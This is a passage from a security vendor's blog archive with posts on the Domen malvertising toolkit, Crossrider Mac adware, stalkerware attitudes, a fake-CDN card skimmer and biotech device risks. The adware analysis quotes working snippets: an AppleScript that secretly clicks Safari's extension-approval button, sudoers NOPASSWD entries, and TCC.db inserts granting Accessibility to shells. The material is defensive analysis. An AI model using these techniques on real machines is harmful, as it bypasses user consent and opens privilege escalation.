Archive for February, 2020

Domen toolkit gets back to work with new malvertising campaign

Last year, we documented a new social engineering toolkit we called “Domen” being used in the wild. Threat actors were using this kit to trick visitors into visiting compromised websites and installing malware under the guise of a browser update or missing font.

Despite being a robust toolkit, we only saw Domen in sporadic campaigns last year, often reusing the same infrastructure that had already been partially disrupted. However, we recently came across a new malvertising campaign with brand new infrastructure that shows Domen is still being used by threat actors.

Even though Domen shares similarities with other social engineering templates, it is unique in its own ways. The client-side JavaScript responsible for the fake updates is one of the most thorough and professional coding jobs we had ever seen.

Previously, we had observed Domen pushing the NetSupport RAT and Predator the thief using its own custom downloader. This time, we noticed a change where the threat actor seems to be experimenting with Smoke Loader, followed by several different payloads.

Domen: the origins

We published our original blog in September 2019, however Domen had been active for several months already. We confirmed this when we found an advertisement posted in a blackhat forum in April 2019 that promoted the toolkit as a way to install EXEs and APKs.

A couple months after our blog, we observed Domen in another campaign—probably carried out by the same threat actor. However, unlike the former one that had been used on compromised websites, this time it was via a malvertising chain (celeritascdn[.]com) leading to a decoy adult site hosted at tendermeets[.]club (a copycat of ftvgirls[.]com).

The reason we believe the two campaigns are related is because the delivery vector for the payload uses the same technique, namely uploading malicious files to Bitbucket.

Between the end of November 2019 and most of February 2020, Domen fell fairly silent.

Latest Domen campaign

On February 19, we caught a new malvertising chain with new domains, this time using a VPN service as a lure.

The threat actor had just created new infrastructure to host the fraudulent page (search-one[.]info), the download site (mix-world[.]best), and the backend panel (panel-admin[.]best).

The payload is this infection chain is Smoke Loader. In one instance, Smoke Loader distributed several secondary payloads, including the IntelRapid cryptominer, a Vidar stealer, and Buran ransomware.

This is an interesting payload combination that seems to be more common these days.

More social engineering schemes

Domen is a well-made toolkit that has been used to distribute a variety of payloads by using tried and tested social engineering tricks. While tracking its author (or distributor), we noticed other forum postings advertising the same sort of payload installs, but using different and creative themes.

The concept is the same, namely, those bogus sites are tempting users to download software that happens to be malware.

Since the decline in browser exploits in recent years, threat actors have migrated toward other infection vectors. As far as web threats are concerned, social engineering remains highly effective.

Malwarebytes business and Malwarebytes for Windows Premium users are already protected against this distribution campaign and its accompanying payloads.

Indicators of Compromise

Domen toolkit


Smoke Loader









The post Domen toolkit gets back to work with new malvertising campaign appeared first on Malwarebytes Labs.

Posted in: NEWS

Leave a Comment (0) →

Mac adware is more sophisticated and dangerous than traditional Mac malware

As the data revealed in our State of Malware report showed, Mac threats are on the rise, but they are not the same type of threats experienced by Windows users. Most notably, more traditional forms of malware, such as ransomware, spyware, and backdoors account for over 27 percent of all Windows threats. That figure is less than 1 percent for Macs.

Further, Mac malware is rather unsophisticated overall. The remaining 99+ percent of Mac threats are “just” adware and potentially unwanted programs (PUPs). This has led some in the Mac community to dismiss these findings as unimportant, even leading one Mac blogger to write:

“Macs don’t get viruses” is a statement that is still overwhelmingly true.

However, adware and PUPs can actually be far more invasive and dangerous on the Mac than “real” malware. They can intercept and decrypt all network traffic, create hidden users with static passwords, make insecure changes to system settings, and generally dig their roots deep into the system so that it is incredibly challenging to eradicate completely.

To demonstrate our meaning, what follows is a detailed analysis of what may be the most sophisticated threat on macOS—called Crossrider—a threat that is “just adware.”

Mac adware installation

Crossrider, also known as Bundlore or SurfBuyer, is detected by Malwarebytes as Adware.Crossrider.

brands=(flashmall webshoppers webshoppy smartshoppy shoptool shoppytool coolshopper easyshopper liveshoppers smart-shoppy easy-shopper bestwebshoppers hotshoppy bestsmartshoppers myshopmate myshopbot surfmate surfbuyer couponizer shoppinizer shopperify mycouponize myshopcoupon mycouponsmart)

Whatever you call it, it’s been around for at least six or seven years, and has evolved fairly frequently during that time.

The first stage installer was found from analysis of a “weknow” uninstaller, which contained a link to a shell script. (The name “weknow” comes from one of many websites used by this adware.) This shell script, which kicks off the entire installation process, consists of around 300 lines of code—a fairly modest script that doesn’t take long to download.

Despite its relatively small size, the script opens a deep rabbit hole, downloading and executing a large number of other files. Since much of the code that gets executed is downloaded, the exact payload of the adware can be changed at a moment’s notice, and can vary depending on all manner of variables, such as where you’re located, whether your machine has been seen before, what else is installed, etc. Further, should any of the various delivery servers be hacked by a more malicious actor, those scripts could be used to deploy more malicious payloads.

Next, after conducting brief tracking data collection and uploading it to a server, Crossrider downloads a file from the following URL:

This file is expanded into an app named The sole purpose of this app is to phish the user’s password by displaying a fake authentication prompt. The password is returned to the script, in plain text, where it is used repeatedly to install the rest of the components.

password phishing dialog mac adware

The script next determines the version of the system and performs one set of actions on macOS 10.11 and higher, and another on older systems.

Installation on 10.11 and up

On newer systems, a compressed is downloaded and executed using the phished password to run as root:

This app obscures the screen, during which time it installs a large number of files. As part of this process, it also makes a copy of Safari that is modified to automatically enable certain Safari extensions when opened, without user actions required.

obscured screen during installation

Although these modifications to Safari break its code signature, which can be used to validate that an app has not been modified by someone other than its creator, macOS will still happily run it because of limitations on when these code signatures are actually checked.

After this process completes, the copy of Safari is deleted, leaving the real copy of Safari thinking that it’s got a couple additional browser extensions installed and enabled.

Installation on 10.10 and older

On older systems, Crossrider downloads the following file:

This is extracted, and an script it contains is executed. This script alone has over 900 lines of code, and it runs a number of other scripts and processes to make changes to Safari and Chrome settings and install browser extensions.

In the case of Safari, part of the process involves an AppleScript that enables an accessibility setting that provides keyboard access to all controls—and then uses that access to click the “Allow” button in the window Safari displays when the user tries to install a Safari extension.

tell application "Safari" to set bounds of windows to {0, 0, -1000, -1000}
 tell application "System Events"
     set visible of process "Safari" to false
     tell application process "Safari"
         set frontmost to true
         log "Clicking button 1 of sheet 1"
         tell window 1 to tell sheet 1 to click button 1
         delay 1
     end tell
 end tell

The script sneakily moves the window offscreen, so the user doesn’t see any of this happen during the installation process. All the user might see is that Safari briefly opens and then closes.

Next, a native Mac binary (like an app, but meant to be executed from the command line rather than through the Finder) is downloaded:

Among other files, this process, when executed, will install a component into the Applications folder, and then run a nearly 750 line shell script to make further browser changes.

Tracking data

Throughout the installation process, the various scripts and processes will repeatedly report data back to a variety of tracking servers. These transactions send potentially sensitive data, such as:

  • a unique identifier for the computer
  • IP address
  • the user name
  • macOS version
  • Safari version
  • Chrome version
  • a list of everything found in the Applications folder
  • a list of all installed agents and daemons
  • a list of all installed system configuration profiles
  • the version of the Malware Removal Tool, a security component of macOS designed to remove certain known pieces of malware

Since much of this data is obtained through scripts and processes that are downloaded from more than one server, the exact data being collected and where it’s being sent can be changed dynamically.

Changes to the system

There are a number of changes made throughout the system, some of them dangerous and difficult to remove for the average person. This makes Crossrider one of the most invasive threats I’ve ever seen on macOS.

System configuration profiles

These profiles are typically used by an IT admin to manage computers, often remotely. However, profiles can also be installed manually, via a .mobileconfig file, and the adware does exactly that.

payload templat mobile config file

The profile that is installed locks the home page and search engine settings in both Safari and Chrome, preventing them from being changed by the user until the profiles are removed.

Managed preferences

A managed preference is another method for changing settings that is managed by an IT admin. On older systems, the adware installs managed preference files that set Chrome’s preferences to pages associated with the adware.

managed preferences content

Changes to the sudoers file

On Unix-based systems, like macOS, the user with the higest level of permissions is the root user. On such systems, the sudoers file is a file that identifies which users are allowed to have root-level access, and how they’re allowed to get it.

Crossrider adware makes changes to the sudoers file in multiple places. In one, lines are added to allow a couple of the installed processes to have root permissions when running on the current user’s account:

someuser ALL=NOPASSWD:SETENV: /Users/someuser/Applications/MyMacUpToDate/MyMacUpToDate
someuser ALL=NOPASSWD:SETENV: /Users/someuser/Applications/UpToDateMac/UpToDateMac

In some cases, the installation process hits a snag and fails to write these changes properly, which invalidates the sudoers file, interfering with the ability to get root permissions. This can affect software installation abd the ability to troubleshoot, and is difficult to fix. (In order to fix the sudoers file, you must have root access, which you can’t get because the sudoers file is broken—it’s a catch-22.)

In other parts of the installation process, the adware gives all processes running for the user unlimited access to root without a password. The scripts try to revert these changes, but may not always be successful (such as if the script or process crashes).


These changes could be hijacked by other malicious software. For example, if a piece of malware were to overwrite the MyMacUpToDate or UpToDateMac processes in the first example (which would not require special access), it could escalate to root to do more damage. In the latter example, any process would be able to elevate to root access unconditionally.


In several places, the installation process will attempt to modify the TCC.db database. This database identifies which permissions the user has given to different processes, such as whether an app can access your calendar, your contacts, your computer’s microphone, your webcam, or certain folders on your system.

This adware attempts to give itself and a wide swath of other processes one of the most powerful capabilities: Accessibility access. This permission allows these processes to control other processes, which can be used to capture sensitive data, among other things.

if [[ "${osxVer}" == *"10.11"* ]] || [[ "${osxVer}" == *"10.12"* ]]; then     /usr/bin/sqlite3 <<EOF
 .open '${TCCDB}'
 insert or replace into access values('kTCCServiceAccessibility','',0,1,1,NULL,NULL);
 insert or replace into access values('kTCCServiceAccessibility','/bin/bash',1,1,1,NULL,NULL);
 insert or replace into access values('kTCCServiceAccessibility','/bin/sh',1,1,1,NULL,NULL);
 insert or replace into access values('kTCCServiceAccessibility','/usr/bin/sudo',1,1,1,NULL,NULL);
 insert or replace into access values('kTCCServiceAccessibility','${TMPDIR}/.tmpma/',1,1,1,NULL,NULL);
 insert or replace into access values('kTCCServiceAccessibility','com.stubberify.mym',0,1,1,NULL,NULL);
 insert or replace into access values('kTCCServiceAccessibility','com.tostubornot.mym',0,1,1,NULL,NULL);
 insert or replace into access values('kTCCServiceAccessibility','com.trustedmac.service',0,1,1,NULL,NULL);
 insert or replace into access values('kTCCServiceAccessibility','com.autobots.transform',0,1,1,NULL,NULL);
 insert or replace into access values('kTCCServiceAccessibility','',0,1,1,NULL,NULL);
 insert or replace into access values('kTCCServiceAccessibility','',0,1,1,NULL,NULL);

This only works on older systems, as the TCC.db file is read-only by anything other than the system on recent versions of macOS. However, on an older system, this can give powerful permissions that could be abused by future updates of the adware, or by malware attempting to escalate its access to user data.

Browser extensions

Several browser extensions are installed for either Safari or Chrome or both, depending on the version of the system and versions of Safari and Chrome. These extensions give the adware greater capability to control the behavior of the browser.

Ordinarily, addition of a browser extension requires the user to confirm, for the express purpose of preventing adware or malware from surreptitiously installing a browser extension. However, this adware uses a number of shady tricks—such as the modified copy of Safari mentioned previously—to get these extensions installed without the user needing to approve them or even being aware they’ve been installed.

Browser extensions can gather an intrusive level of information from the browser: essentially, any data that may be displayed on a website or entered into a form on a website. The latter can include sensitive data, such as usernames, passwords, and credit card numbers.

Launch agents and daemons

Launch agents and daemons provide one of the most common ways for processes to stay persistently running on macOS. Crossrider adware installs multiple agents or daemons, depending on which files are being installed. Fortunately, these are extremely easy to spot for someone knowledgeable—in fact, they’re one of the first things a tech might look for—and are relatively easy to remove.

Malware must be worse, right?

Fortunately (or unfortunately, depending on how you look at it), no. Contrast Crossrider adware with some nation-state malware, such as malware made by North Korea’s Lazarus group or the OceanLotus malware thought to be created by Vietnam. Such malware typically installs a single launch agent or daemon, easily spotted by any expert who looks at the machine. Crossrider’s installation process alone far exceeds these forms of malware in sophistication.

Mac malware tends not to be particularly sophisticated. Of course, this doesn’t mean it can’t be dangerous, but right now, it’s sitting at the malware kiddy table. Simply put: It’s not sophisticated because it doesn’t have to be. If you’re a Mac user infected with malware, there are probably not going to be any outward symptoms you’d notice.

In contrast, adware is highly noticeable, since it changes the behavior of your computer, most typically your web browser. For this reason, Mac adware has had to evolve well beyond Mac malware, and has become far sneakier and harder to get rid of.

What’s the takeaway?

Although many Mac experts like to dismiss adware as a non-issue, saying people only get infected when they do “stupid things,” most of the most massive data breaches and damaging ransomware attacks on Windows machines happen because of user negligence: leaving data exposed on the Internet, opening malicious links via phishing email, or failing to patch software in a timely manner.

Adware is a growing problem on the Mac—and on Windows and Android operating systems as well. It was the most prevalent threat across all regions globally, for both consumers and businesses. And we saw that some Mac adware was actually more prevalent than most Windows threats in 2019.

Worse, these adware infections are usually more severe than a malware infection, opening up potential security holes that could be taken advantage of by more malicious threats and proving arduous to get rid of. In addition, adware on the Mac also commonly intercepts and decrypts all network traffic, uses randomly-generated names for installed files, uses analysis avoidance techniques to prevent researchers from analyzing them, creates hidden users on the system with known passwords, and more.

All in all, if I had to choose between one or the other, I would willingly infect my own machine with most of the Mac malware out there before I would do the same with Mac adware. Mac malware often makes me laugh. Mac adware sometimes gives me chills.


The following indicators of compromise are associated with this adware.


Files 441fa62645591b2aa1b853ebfa51fe5bb36e6464ad3a4ff58a0b8297bea851d9
mm-install-macos ee94315a1099a982a2b61878a64ee6fe9134e544cdcae565995948a8ca843e51
webtools 888a1f9dfadde892496a3214ceb2a5a62a3997381ba6dbcd4e741d033352fd31
imsearch.tar.gz e07c9e59f7621eead7300cfe264a2d24a7749d592d8a2b32c48125eadf293f08 591919f7b5ced77431990e7e9f257ce049f1fb2f93e9cdcb19b5400060518031
iwt.bin 168d9c1a06ab3f633e6fc724834ad8a9f4dc3c71945a34342347ce0df042a361 df402cf21e5f78e55050d7ee14c050869d477faaeb58ab841f5992a0638a4a9f
installSafariExtension 212a954a7b67e851063daa2acabe841e8e54a4c29ca4f1fc096a160f1764aa14
installSafariHpNt 18b449b7d25733557d305b8a8ae9b331e628ec892996a83a39cb74bf2a7eca9a    b5ac18d3ea66dfad4baf02efad1a2f27f8134a2cd0f3c1d78e44d49bed613064 6180666302bbf8032801d0aec6df08fbd27349c9d628f3a3dd7295256bf751b6

Thanks to Aditya Raj Das for finding the sample and assisting with the analysis!

The post Mac adware is more sophisticated and dangerous than traditional Mac malware appeared first on Malwarebytes Labs.

Posted in: NEWS

Leave a Comment (0) →

Stalkerware and online stalking are accepted by Americans. Why?

Despite warnings from domestic abuse networks, privacy
rights advocates, and a committed faction of cybersecurity vendors, Americans may
be accepting and minimizing online stalking behaviors, including the use of
invasive apps that can pry into a user’s text messages, emails, photos, videos,
and phone logs.

The limited opposition to these at-times abusive behaviors
was revealed by a new
study conducted by NortonLifeLock
, consumer cyber safety vendor and founding
member of the Coalition Against
, which Malwarebytes helped form last year.

The distressing survey revealed that nearly half of
individuals between the ages of 18 and 34 said they found online stalking to be
“harmless.” Further, the study revealed that 1 in 10 Americans admitted to
using digital monitoring apps—sometimes referred to as stalkerware—against
their ex or current romantic partners.

How did we get here?

Unfortunately, we cannot exact whether the NortonLifeLock
survey results represent a shift in attitudes or reflect a long-held acceptance
of surveillance culture online. While US government agencies have recorded
stalking statistics for decades, those same agencies either have not recorded
admissions of online stalking behavior and perceptions of its harms, or did not
respond to requests for such data.

However, domestic abuse advocates and researchers agreed
that several factors play a role in the public’s acceptance of this type of
behavior. Many romantic comedy films romanticize stalking, while increasingly
more consumer home devices have normalized private, digital surveillance.
Further, current mobile apps have turned the viewing of someone’s private life
into an otherwise harmless interaction.

More likely, though, is that the public has always failed to
recognize and respond to the actual harms of stalking, said Elaina Roberts,
technology safety legal manager with National Network to End Domestic Violence.

“This is an age-old crime and people’s perceptions of it, in
my opinion, haven’t changed all that much,” Roberts said.

The NortonLifeLock Online Creeping Survey

In conjunction with The Harris Poll, NortonLifeLock surveyed
more than 2,000 adults in the United States about “online creeping”—behavior
that includes consistent, stealthy tracking of someone online, which could also
veer into behavior that is more akin to cyber stalking.

Overall, the survey found that 46 percent of respondents
admitted to “stalking” an ex or current partner online “by checking in on them
without their knowledge or consent.”

The most common forms of online stalking included checking a
current or former partner’s phone—at 29 percent—and looking through a partner’s
search history on one of their devices without permission—at 21 percent. Disturbingly,
9 percent of respondents admitted to creating a fake social media profile to
check in on their partners, and 8 percent of respondents admitted to tracking a
partner’s physical activity through their phone or through a health-related

Kevin Roundy, technical director for NortonLifeLock, warned
about these behaviors.

“Some of the behaviors identified in the NortonLifeLock
Online Creeping Survey may seem harmless, but there are serious implications
when this becomes a pattern of behavior and escalates, or when stalkerware and
creepware apps get in the hands of an abusive ex or partner,” Roundy said.

When asked why respondents engaged in these behaviors, the
top two answers revealed a lack of trust and an itching, potentially harmful level
of concern; 44 percent said “they didn’t trust [their partner] or suspected
they were up to no good,” while 38 percent said they were “just curious.”

The gender disparity in the results was clear. In seemingly
every category, men found it more acceptable to engage in these behaviors and
to have these behaviors enacted against them.

While 35 percent of respondents said “they don’t care if
they are being stalked online by a current or former partner as long as they
are not being stalked in person,” it was 43 percent of men who agreed with that
statement versus 27 percent of women. Further, 20 percent of men said they
tracked a current or former partner’s location, versus 13 percent of women. Men
also showed that they more readily accepted online stalking if one or both of
the partners in a relationship had cheated or were merely suspected of

These results reflect broader statistics in America about
who is more often victimized by stalking.

According to a national report of about 13,000 interviews
conducted by the Centers for Disease Control and Prevention (CDC), an estimated
15.2 percent of women and an estimated 5.7 percent of men have been stalked in
their lifetime. Women who said they were stalked during their lifetimes stated
they were the target of a variety of behaviors, including being approached at
home or work (61.7 percent); receiving unwanted messages like texts and voice
mails (55.3 percent); and being watched, followed, or spied on with a
“listening device, camera, or GPS device” (49.7 percent).

When asked if the CDC records the rate of admission of
stalking behavior and perceptions to stalking behavior, a spokesperson said the
agency does not keep such statistics.

The Bureau of Justice Statistics, which also tracks stalking in America, did not respond to a request for similar data.

Despite the two agencies’ robust datasets on the threat of
stalking, the NortonLifeLock survey revealed a different perspective on similar
behavior—a potentially concerning coziness with it. Young Americans in
particular, the survey showed, found little threat in online stalking.

The survey said that 45 percent of those aged 18–34 found
online stalking to be “harmless.” The same age group most heavily engaged in
the behavior—65 percent said they have “checked in on a current or former
significant other.”

Domestic abuse advocates argue that those high statistics
reflect a society that fails to fully recognize the harms of stalking,
cyberstalking, and invasive behavior toward romantic partners. Further, the
language actually used in the survey might point to less nefarious
interpretations by young people.

The normalization and minimization of stalking

Despite the NortonLifeLock study revealing troubling
perceptions of online stalking behavior, Erica Olsen, director of Safety Net at
National Network to End Domestic Violence, said these perceptions existed long
before the advent of technology-enabled abuse. It’s been happening for decades,
Olsen said.

“I unfortunately think that stalking behaviors have always,
to some extent, been accepted and minimized.” Olsen said. “I think a lot of it
has to do with the romanticizingof some of the behaviors—specifically
following and spying.”

Olsen pointed to many romantic comedies that portray
stalking as endearing.

In The Graduate, Dustin Hoffman’s character follows
Katharine Ross’s character despite explicitly being told to drop contact, much
like John Cusack’s character in Say Anything ignores the wishes of his
ex-girlfriend played by Ione Skye. The 1954 film Seven Brides for Seven
involves several men who kidnap a group of women, and no, it isn’t
a horror movie.

As The New Statesmen wrote:

“A group of brothers kidnap six attractive women by causing
a life-threatening avalanche that keeps them imprisoned all winter. The women
play pranks on the men in revenge, and, in a shocking case of Stockholm
syndrome, everyone has an all-round jolly time. They pair off and are all
married by summer.”

These types of films can impact audience perceptions of
intrusive and aggressive behavior, found Julia Lippman, a research fellow at
the Center for Political Studies-Institute for Social Research at the
University of Michigan.

According to Lippman’s paper, “I Did It Because I Never Stopped Loving You: The Effects of Media Portrayals of Persistent Pursuit on Beliefs About Stalking,” women who watched movies with positive portrayals of aggressive romantic pursual were more likely to accept those behaviors, as opposed to women who watched movies with scary or threatening depictions of those same types of behaviors.

In speaking to the online outlet Bustle, Lippman said:

“Positive media portrayals of stalking—like those where
the pursuer is rewarded by ‘getting the girl’— can lead people to see stalking
in a more positive light.”

Media portrayals aside, another factor could play a role in the public’s acceptance of online stalking that amounts to digital surveillance—the privatization of surveillance in our own neighborhoods. Millions of smart doorbells have crept into countless suburbs across America, capturing footage of package thieves, yes, but, more often, of neighbors, children, and animals engaged in harmless behavior.

According to a survey conducted by The Washington Post,
smart doorbell owners who understood the privacy risks of their devices said
the risks were not enough to deter them from ownership. As The Washington Post

“[In] the unscientific survey, most people also replied that
they were fine with intimate new levels of surveillance—as long as they were
the ones who got to watch.”

Finally, the acceptance of “online stalking” by younger
generations could intersect with emerging ways of staying in touch with one
another, and with the language that young people—particularly teenagers—use.

Diana Freed, a PhD student at the Intimate Partner
Violence tech research lab
 led by Cornell Tech faculty, said that, in
her research, she has found that teenagers often use the term “stalking” in a
harmless way to check in on people online.

“It’s a very common term used with teens—‘Let’s stalk that
person on Instagram,’—but they’re not saying it with the intent to harm,” Freed

(Full disclosure, when this Malwarebytes Labs writer
attended college, he frequently heard the words “Facebook stalk” used to
describe looking up a romantic crush, whether that meant viewing their photos
or trying to find their “Relationship Status.”)

Freed said many apps also provide an opportunity for
“wholesome” viewing of other people’s lives. With features like TikTok’s
constant video feed or Snapchat Stories and Instagram Stories—which give users
the ability to post phots and short videos for only 24 hours—users can view
another user’s daily activities, despite being physically separated. That type
of behavior does not have to be covert, Freed said, and can be done “with full
knowledge” between two people who are friends offline.

“The ability to follow people closely is made available to
us just by the features offered,” Freed said.

As to whether the presence of the technology
itself—including stalkerware-type apps—has somehow created more stalkers, no
expert interviewed for this piece saw a provable correlation.

Roberts of NNEDV said that even before the proliferation of
GPS devices and stalkerware, domestic abusers would excuse their persistent,
physical following of their partners by saying they were merely concerned for
their partner’s safety. Today, she said, abusers use the same lies—urging survivors
to use GPS location apps or stalkerware as a way to ensure safety.

“So, while we can potentially say that people are just more
inclined to be accepting of this behavior today,” Roberts said, “I believe the
truth is that people have always minimized these types of ‘caring’
behaviors as they appear to be done out of concern.”

Moving forward

All of this presents two concerning realities—Americans are
growing warm to online stalking; Americans have always accepted stalking. Neither
is the type of reality that should go unopposed.

Remember, online stalking that violates a person’s privacy is not harmless. Many of the behaviors described in the survey are the same types of behaviors that domestic abuse survivors face every day, from using stalkerware to learn private information, to tracking a person’s GPS location as a means to find them to inflict violence.

For years, Malwarebytes has worked to detect and raise
awareness about invasive monitoring apps that can pry into users’ lives without
their consent
. This latest survey only proves that more work is needed.
We’re ready for it.

The post Stalkerware and online stalking are accepted by Americans. Why? appeared first on Malwarebytes Labs.

Posted in: NEWS

Leave a Comment (0) →

Fraudsters cloak credit card skimmer with fake content delivery network, ngrok server

Threat actors love to abuse legitimate brands and infrastructure—this, we know. Last year we exposed how web skimmers had found their way onto Amazon’s Cloudfront content delivery network (CDN) via insecure S3 buckets. Now, we discovered scammers pretending to be CDNs while exfiltrating data and hiding their tracks—another reason to keep watchful eye on third-party content.

Sometimes, what looks like a CDN may turn out to be anything but. Using lookalike domains is nothing new among malware authors. One trend we see a fair bit with web skimmers in particular is domains that mimic Google Analytics: Practically all websites use this service for their ranking and statistics, so it makes for credible copycats.

In the latest case, we caught scammers using two different domains pretending to be a CDN. While typically the second piece of the infrastructure is used for data exfiltration, it only acts as an intermediary that attempts to hide the actual exfiltration server.

Oddly, the crooks decided to use a local web server exposed to the Internet via the free ngrok service—a reverse proxy software that creates secure tunnels—to collect the stolen data. This combination of tricks and technologies shows us that fraudsters can devise custom schemes in an attempt to evade detection.

Inspecting code for unauthorized third-parties

We identified suspicious code on the website for a popular Parisian boutique store. However, to the naked eye, the script in question looks just like another jQuery library loaded from a third-party CDN.

Figure 1: Compromised online store, with source code showing a CDN like domain

Although the domain name (cdn-sources[.]org) alludes to a CDN, and unveil.js is a legitimate library, a quick look at the content shows some inconsistencies. There should not be fields looking for a credit card number for this kind of plugin.

Figure 2: A malicious third-party library impersonating a legitimate one

To clear any doubts, we decided to check an archived copy of the site and compared it with a live snapshot. We can indeed see that this script did not exist just a couple of weeks prior. Either it was added by the site owner, or in this case, injected by attackers.

Figure 3: Snapshots comparing online store before and after the hack

The script checks for the current URL in the address bar and if it matches with that of a checkout page, it begins collecting form data. This typically includes the shopper’s name, address, email, phone number, and credit card information.

Figure 4: Another fake CDN domain used as part of the data exfiltration process

Data exfiltration via ngrok server

Once this data is collected, the skimmer will exfiltrate it to a remote location. Here, we see yet another CDN lookalike in cdn-mediafiles[.]org. However, after checking the network traffic, we noticed this is not the actual exfiltration domain, but simply an intermediary.

Connection: keep-alive
Accept: /
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Referer: https://www.{removed}.com/checkout/onepage/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Content-Length: 36

Instead, the GET request returns a Base64 encoded response. This string, which was already present in the original skimmer script, decodes to //d68344fb.ngrok[.]io/ad.php which turns out to be the actual exfiltration server.

Figure 5: Customer data being stolen and exfiltrated to ngrok server

Ngrok is software that can expose a local machine to the outside as if it was an external server. Users can create a free account and get a public URL. Crooks have abused ngrok to exfiltrate credit card data before.

To summarize, the compromised e-commerce site loads a skimmer from a domain made to look like a CDN. Data is collected when a shopper is about to make a payment and sent to a custom ngrok server after a simple redirect.

Figure 6: Traffic flow, from skimming to data exfiltration

The above view is simplified, only keeping the key elements responsible for the skimming activity. In practice, network captures will contain hundreds more sequences that will make it more difficult to isolate the actual malicious activity.

Blocking and reporting

We caught this campaign early on, and at the time only a handful of sites had been injected with the skimmer. We reported it to the affected parties while also making sure that Malwarebytes users were protected against it.

Figure 7: Malwarebytes blocking the skimmer on the checkout page

Threat actors know they typically have a small window of opportunity before their infrastructure gets detected and possibly shutdown. They can devise clever tricks to mask their activity in addition to using domains that are either fresh or belong to legitimate (but abused) owners.

While these breaches hurt the reputation of online merchants, customers also suffer the consequences of a hack. Not only do they have to go through the hassle of getting new credit cards, their identities are stolen as well, opening the door to future phishing attacks and impersonation attempts.

Indicators of Compromise

Web skimmer domain


Web skimmer scripts




Exfiltration URL


The post Fraudsters cloak credit card skimmer with fake content delivery network, ngrok server appeared first on Malwarebytes Labs.

Posted in: NEWS

Leave a Comment (0) →

Biotech health care innovations meet security challenges

The level and speed of innovations taking place in the biotech industry are baffling. On the one hand, it makes us hopeful we can quickly reduce the number of illnesses and their consequences through technological advancement—saving thousands of lives. On the other, concerns about the application of Internet-connected technology leave us wondering: at what cost?

Where does the mix of technology and medicine lead us? Advancements in genetic therapy have reshaped cancer treatment as we know it. Yet, other applications, such as automating medicine intake by measuring biometrics, may introduce whole other problem sets the medical and security world haven’t solved for.

Knowing that every human body is unique and may react in another way to the same procedure, it seems prudent to draw the line at a certain amount of automation. But how do we determine where to draw the line? Is it smart to leave that decision to the big pharmaceuticals? Let’s have a look at the developments in biotech that require bigger picture thinking from the security and privacy perspectives.

Developments in the health care industry

Some of the most promising health care developments in late stages of refining or even already in use are techniques where sensors are attached to or inserted into the patient’s body. The sensors are designed to transmit data about certain bodily conditions back to healthcare personnel.

One such technology is inserted directly into patients’ medication via chip. These “smart pills” send biometric data from within the blood stream. When the patient ingests the pill, the chip will be detected by a patch on her stomach the moment it is digested. If the patch doesn’t receive the appropriate signal, it alerts the patient’s doctor.

A big step forward for the future of smart pills will be the automation and timely administering of medicine; something currently in development. These smart pills are being designed to make patients life’s easier by embedding a tracking system in the pill that trigger the release of the drug in a timely manner, so you can’t forget.

Smart pills could also be programmed to release the medication when certain circumstances are met. A system similar to this already exists for diabetes. Insulin pumps for type 1 diabetics are in use that release insulin when a low blood sugar is detected, basically by mimicking the way the pancreas would behave for healthy people.

Diagnostic biotech

Existing bio-sensors are internal measurement devices that broadcast body metrics like blood pressure, pulse, oxygen saturation, blood sugar, etc. These bio-sensors and sensors measuring the presence of other substances in the blood can be used to finetune the administration of drugs. But what if anybody else can receive these transmissions?

The feasibility of multiplex biosensors for
bloodstream infection diagnosis has been under investigation for a few years
and is another development that could lead to transmissions concerning our health
from inside our body to a “smart” device.

Pharmaceutical companies have already released digital smart pills containing computer chips. The first digital cancer pill, which was released in early 2019, contains a chip and capsules filled with capecitabine, a cancer chemotherapy that patients need to take several times a day.

Other biotech innovations

The human genome has been almost fully mapped and we are rapidly finetuning the ability to read the map. But what does this prospect bode for the future of the information that can be extracted from the DNA samples we provided for various different reasons?  Will donating blood or participating in a DNA test now result in a privacy nightmare later on? Will the risk we take now grow on us as science finds out more about the information stored in our DNA.

DNA diseases
Genetically detectable diseases

With greater understanding of our genetics comes greater capacity for their manipulation. And gene editing currently stands as one of the most exciting, and worrying, areas within the biotech industry.

Another worrying advancement is the use of artificial intelligence (AI) to make the development of new drugs faster and cheaper. AI particularly can be used to reduce the amount of trial and error needed to design a drug candidate once a promising disease target had been identified. It can also be used to investigate and find unexpected use cases for drugs that fail in clinical trials. Promising changes, for sure. But what might AI miss that the human mind would catch? And how much would morality come into play if machines are conducting all of the testing?

Remote control of artificial limbs and animals

The advancement of modern prosthetics has
gone hand in hand with the upcharge in rapid developments in the biotech health
care sector.

In a combination of robotics and neuro-engineering
scientists are working on a new robotic hand that could be a life-changing
device for amputees. The goal is to read and transmit intended finger movement
read from the muscular activity on the amputee’s stump for individual finger
control of the prosthetic hand.

In the military field sharks and other
animals have been given brain implants that makes them remotely controllable. These
sharks could for example be used to find enemy submarines.

Communication protocols in biotech

The smart pill, produced and patented by Proteus and called Abilify MyCite, sends a simple pulse from the pill to the patch as soon as the pill gets absorbed by stomach acid. No problem there, but then the patch sends data like the time the pill was taken and the dosage to a smartphone app over Bluetooth. The data is stored in the cloud where the patient’s doctor and up to four other people chosen by the patient, can access the information. The patient can revoke their access at any time.

In 2017 the FDA stated it was planning to hire more staff with “deep understanding” of software development in relation to medical devices, and engage with entrepreneurs on new guidelines, because it expected to get more approval requests for digital pills. This was after the approval of Abilify MyCite, which is a typical symptom of legislation running after technical innovations without ever truly catching up.

In 2018 hackers demonstrated they could install malware on an implanted pacemaker after they had discovered bugs Medtronic‘s software delivery network, a platform that doesn’t communicate directly with pacemakers, but rather brings updates to supporting equipment like home monitors and pacemaker programmers, which health care professionals use to tune implanted pacemakers.

Bluetooth and medical devices

Bluetooth is ideal for the short-range, continuous wireless connection, that we use for streaming audio and data. The most commonly used Bluetooth protocols in medical equipment are Bluetooth Low Energy (BLE) and Bluetooth Classic

BLE is a Bluetooth protocol that was launched in 2010, it was designed to achieve goals of low power consumption and latency while accommodating the widest possible interoperable range of devices. The downside is that it can behave differently depending on smartphone platforms. This is because the device advertises on a schedule for smartphone response. When the smartphone responds, a handshake (bonding) is made, facilitating a confirmed transfer of the data packet to the smartphone before closing the connection. This saves energy, but it’s also responsible for unpredictable data transfer speed.

BLE also does not require paring between
the sender and receiver and it can send authenticated unencrypted data. We
understand the benefits of saving energy:

  • Devices can stay longer in the
    body without having to be replaced
  • Batteries can be smaller, so easier
    to insert and less obtrusive

